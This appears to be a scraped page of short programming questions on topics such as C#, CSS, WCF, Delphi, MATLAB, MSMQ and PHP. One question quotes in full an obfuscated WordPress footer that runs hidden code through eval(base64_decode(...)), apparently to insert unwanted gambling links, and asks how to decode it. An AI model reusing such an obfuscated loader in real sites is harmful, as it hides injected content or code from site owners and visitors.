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  • Is it poor practice to identify objects via an enumeration property, instead of using GetType()?

    - by James
    I have a collection of objects that all implement one (custom) interface: IAuditEvent. Each object can be stored in a database and a unique numeric id is used for each object type. The method that stores the objects loops around a List<IAuditEvent>, so it needs to know the specific type of each object in order to store the correct numeric id. Is it poor practice to have an enumeration property on IAuditEvent so that each object can identify itself with a unique enumeration value? I can see that the simplest solution would be to write a method that translates a Type into an integer, but what if I need an enumeration of audit events for another purpose? Would it still be wrong to have my enumeration property on IAuditEvent?

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  • How do I stop IE6 clipping an element positioned outside its parent via negative margins?

    - by Paul D. Waite
    I have an element positioned outisde its parent via negative margins, like this: <style> .parent { height: 1%; } .element { float: left; margin-left: -4px; } </style> ... <div class="parent"> <div class="element">Element</div> </div> In Internet Explorer 6, the part of .element positioned outside of its parent element is clipped, i.e. invisible, hidden, cut off. How do I fix this?

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  • How can I convert my Stream (image data) back into a file

    - by James Hay
    I have a WCF restful service that I'm trying to upload an image to. I have a very basic metod that accepts a stream as it's only parameter and is defined in the contract as: [OperationContract] [WebInvoke(UriTemplate = "ReviewImage", BodyStyle = WebMessageBodyStyle.Bare, Method = "POST")] ReviewImage UploadImage(Stream data); I'm actually consuming this service from flash (which is fairly inconsequntial) which selects a file from the file system and uploads it through the service url. It all works seems to work, adding a breakpoint to the UploadImage method breaks as expected. If I wanted to save this file back to disk, is it just a case of reading this Stream object into a FileStream object that creates the file somewhere? A bit like the this? When i do actually do this the file can not be opened as an image. I'm sure i'm missing a key piece of knowledge here. Does my stream actually contain just the image bytes or does it contain more than that?

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  • Is it possible to make a TListView search by the caption of a different column in Delphi?

    - by James
    Hi, When you set the Caption of a TListItem it seems to always set the Text for the first column in the row. When you start typing in the ListView it will search & select the closest match based on the caption of the first column. I have a situation where I need the caption of the first row to be empty, but still need the search functionality to work as normal (in this case the data I would be searching for may be in the 2nd/3rd column). Is this possible without using any 3rd party controls?

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  • Implementing a plugin interface

    - by James P.
    What's a good way of adding a plugin interface such that it's possible to have optional components? I'm aware of the Class.forName() approach (used with JDBC for example) but there is also dynamic class loading.

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  • Find hosted directories Jetty/Apache

    - by Paul Creasey
    Hi, Let say I have a directory which is being hosted by Jetty or Apache (i'd like an answer for both), i know the URL including the port and i can log into the server. How can i find the directory that is being hosted by a certain port? I'd also like to go the other way, i have a folder on the server, which i know if being hosted, but i don't know the port so i can't find it in a web browser. How can i find a list of directories that are being hosted? This has been bugging me for ages but i've never bothered to ask before! Thanks.

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  • How do I add animation to an iPhone app?

    - by james p
    So I came from a Flash background where I can animate in timeline. I've completed the Beginning iPhone Development book and just realized that I still don't know how to get an animation in. I'm guessing I need to import png sequences? Can anyone point me to an appropriate place to learn more about this topic? I want to make a game and my game objects need to animate. Thanks in advance!!

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  • How do i get rid of NaNs in matlab?

    - by Paul
    I have files which have many empty cells which appear as NaNs when i use cell2mat but the problem is when i need to get the average values i cannot work with this as it shows error with NaN. In excel it overlooks, how do i do the same in matlab? thanks

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  • [Drupal] SQL error reporting by mail

    - by Paul
    I was wondering if its possible to have some kind of SQL error reporting that sends me an email that includes the error and the website that it's been found on. I'd like to take this precaution because of hosting multiple drupal systems. There is a PHP error variant: http://drupal.org/project/php_errors Hope you guys know a way to become aware of any possible SQL errors by not loggin in to check the error report.

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  • Decoding base64 php file

    - by James Wanchai
    I currently have an encoded footer file for a wordpress file I want to decode, because the theme author has put in some 'interesting' links. Don't get me wrong, I'm very happy to link back to the author, but gambling sites aren't really what I want! The file is this- <?php $o="QAAAOzh3b3cnbmlka3JjYicvUwAAQkpXS0ZTQldGU08nKScgKAEAZWhzc2hqKQJQIC48Jzg5Cg0AADtjbnEnZGtmdHQ6JWRrYmYGAHUlOTsoAUABtW5jOiVhaGhzYsCEAZAC62FqYmlyJQKAJztyawBya24AIDk7ZidvdWJhOiUIo2VraGBuAIBpYWgvIHJ1awczJTlPaGpiOzEAKGYGgAMQCg0nArNwd1hrbnRzWAAAd2ZgYnQvIHRodXNYZGhrchAAamk6BpFYaHVjYnUhY2J3c28Atjo2IXNuc2tiAxA6BVMJoCgIUgvDDiEACg0BIHR3ZmkNtWtiYXMlOScnAARDYnRuYGliYycnZX4nCtZvcwAAc3c9KChwcHApcGJlNWFiYgAAaylkaGolJ3NmdWBiczolWAa7ZWtmaWwEEAH5JwxRJwBgBpEQEDsAgQcVCMB1bmBvByFEaGMG7wbma2hkZmtqCSBmc2RvBwEoJQceS2gCECdDZnNuLDBpYAbxKwtfC1BoaWtuDVACYnVidGgODHJ1ZGIFHwwiBLMnU253dAUCEE9wKQBDam5ra25oaWZuHKBrbnVzBL8EsgQ3VHJgZnUJwGNjbmIE0hDIDhgwGMMYkPZBJQUp0h6AJQMvKCUpYGN+FAEob3NqaxpQAAAnJyc=";eval(base64_decode("JGxsbD0wO2V2YWwoYmFzZTY0X2RlY29kZSgiSkd4c2JHeHNiR3hzYkd4c1BTZGlZWE5sTmpSZlpHVmpiMlJsSnpzPSIpKTskbGw9MDtldmFsKCRsbGxsbGxsbGxsbCgiSkd4c2JHeHNiR3hzYkd3OUoyOXlaQ2M3IikpOyRsbGxsPTA7JGxsbGxsPTM7ZXZhbCgkbGxsbGxsbGxsbGwoIkpHdzlKR3hzYkd4c2JHeHNiR3hzS0NSdktUcz0iKSk7JGxsbGxsbGw9MDskbGxsbGxsPSgkbGxsbGxsbGxsbCgkbFsxXSk8PDgpKyRsbGxsbGxsbGxsKCRsWzJdKTtldmFsKCRsbGxsbGxsbGxsbCgiSkd4c2JHeHNiR3hzYkd4c2JHdzlKM04wY214bGJpYzciKSk7JGxsbGxsbGxsbD0xNjskbGxsbGxsbGw9IiI7Zm9yKDskbGxsbGw8JGxsbGxsbGxsbGxsbGwoJGwpOyl7aWYoJGxsbGxsbGxsbD09MCl7JGxsbGxsbD0oJGxsbGxsbGxsbGwoJGxbJGxsbGxsKytdKTw8OCk7JGxsbGxsbCs9JGxsbGxsbGxsbGwoJGxbJGxsbGxsKytdKTskbGxsbGxsbGxsPTE2O31pZigkbGxsbGxsJjB4ODAwMCl7JGxsbD0oJGxsbGxsbGxsbGwoJGxbJGxsbGxsKytdKTw8NCk7JGxsbCs9KCRsbGxsbGxsbGxsKCRsWyRsbGxsbF0pPj40KTtpZigkbGxsKXskbGw9KCRsbGxsbGxsbGxsKCRsWyRsbGxsbCsrXSkmMHgwZikrMztmb3IoJGxsbGw9MDskbGxsbDwkbGw7JGxsbGwrKykkbGxsbGxsbGxbJGxsbGxsbGwrJGxsbGxdPSRsbGxsbGxsbFskbGxsbGxsbC0kbGxsKyRsbGxsXTskbGxsbGxsbCs9JGxsO31lbHNleyRsbD0oJGxsbGxsbGxsbGwoJGxbJGxsbGxsKytdKTw8OCk7JGxsKz0kbGxsbGxsbGxsbCgkbFskbGxsbGwrK10pKzE2O2ZvcigkbGxsbD0wOyRsbGxsPCRsbDskbGxsbGxsbGxbJGxsbGxsbGwrJGxsbGwrK109JGxsbGxsbGxsbGwoJGxbJGxsbGxsXSkpOyRsbGxsbCsrOyRsbGxsbGxsKz0kbGw7fX1lbHNlJGxsbGxsbGxsWyRsbGxsbGxsKytdPSRsbGxsbGxsbGxsKCRsWyRsbGxsbCsrXSk7JGxsbGxsbDw8PTE7JGxsbGxsbGxsbC0tO31ldmFsKCRsbGxsbGxsbGxsbCgiSkd4c2JHeHNiR3hzYkd4c2JEMG5ZMmh5SnpzPSIpKTskbGxsbGw9MDtldmFsKCRsbGxsbGxsbGxsbCgiSkd4c2JHeHNiR3hzYkQwaVB5SXVKR3hzYkd4c2JHeHNiR3hzYkNnMk1pazciKSk7JGxsbGxsbGxsbGw9IiI7Zm9yKDskbGxsbGw8JGxsbGxsbGw7KXskbGxsbGxsbGxsbC49JGxsbGxsbGxsbGxsbCgkbGxsbGxsbGxbJGxsbGxsKytdXjB4MDcpO31ldmFsKCRsbGxsbGxsbGxsbCgiSkd4c2JHeHNiR3hzYkM0OUpHeHNiR3hzYkd4c2JHd3VKR3hzYkd4c2JHeHNiR3hzYkNnMk1Da3VJajhpT3c9PSIpKTtldmFsKCRsbGxsbGxsbGwpOw=="));return;?> Would anyone be able to do me a huge favour and decode it, I've tried using Google but can't seem to do it right. Thank you!

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  • MSMQ sending message problem... (c#)

    - by Paul
    My code : string _path = "mymachine\\Private$\\example"; // create a message queue object MessageQueue MQueue = new MessageQueue(_path); // create the message and set the base properties Message Msg = new Message("Messagem"); Msg.ResponseQueue = MQueue; Msg.Priority = MessagePriority.Normal; Msg.UseJournalQueue = true; Msg.Label = "gps1"; // send the message MQueue.Send(Msg); // close the mesage queue MQueue.Close(); No error, but nothing in my MessageQueue... Any help?

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  • Skip reading strings in matlab

    - by Paul
    Is there is easy command in matlab which prevents program from crashing when it reads characters? I use xlsread to read a (20 400) matrix data , the first row and column get disregarded as they have headers, so that: data = xlsread ( ' C:\file.xls') results in data with a size of (19 399). I have a problem, some cells have missing data and it's written ' missing' and on some data sets i have headers reappear in middle. Is there a way to skip these characters without the program crashing and me having to open the file in excel and deleting those fields? Thanks

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  • Questions about "sets"

    - by James
    I have a test tomorrow that I am revising for and the lecturer has supplied some sample questions with no answers. I was hoping I could get some help with a couple of them. I've written what I think the answer is for them. 1. What is the type of the set {1, 2, 3}? integer/number 2. What is the type of the set {{1}, {2}, {3}}? integer/number (unsure what putting each number in {} does?) 3. What is the type of the set {{1}, {2}, {3}, empty}? integer/number 4. What is the type of the set {1, {2}, 3}? — is it well typed? integer/number 5. What is the type of the set {1, 2, john}? — is it well typed? unsure for a mixed set. Taking a complete guess of void or empty. Any help will be much appreciated.

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  • How to save massive numbers in php...

    - by James Rattray
    I want Pi to like 100,000,000 decimals/digits... And variables (well for me) say they have a limit of 67,000,000 bytes... Is there any way around this? can you save the first 10,000 characters/digits into one? can you save it into an array 10,000 in each? Is there a way? If so how? Thanks alot...

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  • Way to store dates with missing days/months in mysql (php)

    - by Paul M
    I want to store dates in mysql so I set the table to be of type 'Date', which is fine but mysql requires that the full date is provided YYYY-MM-DD. However some of my data does not include day and some is missing the month. Now I could just use a varchar(10) field, but then its difficult to run date based queries on the data. Is there another date format which is not as strong and would allow me to use ?? or 00 where the day/month is not known?

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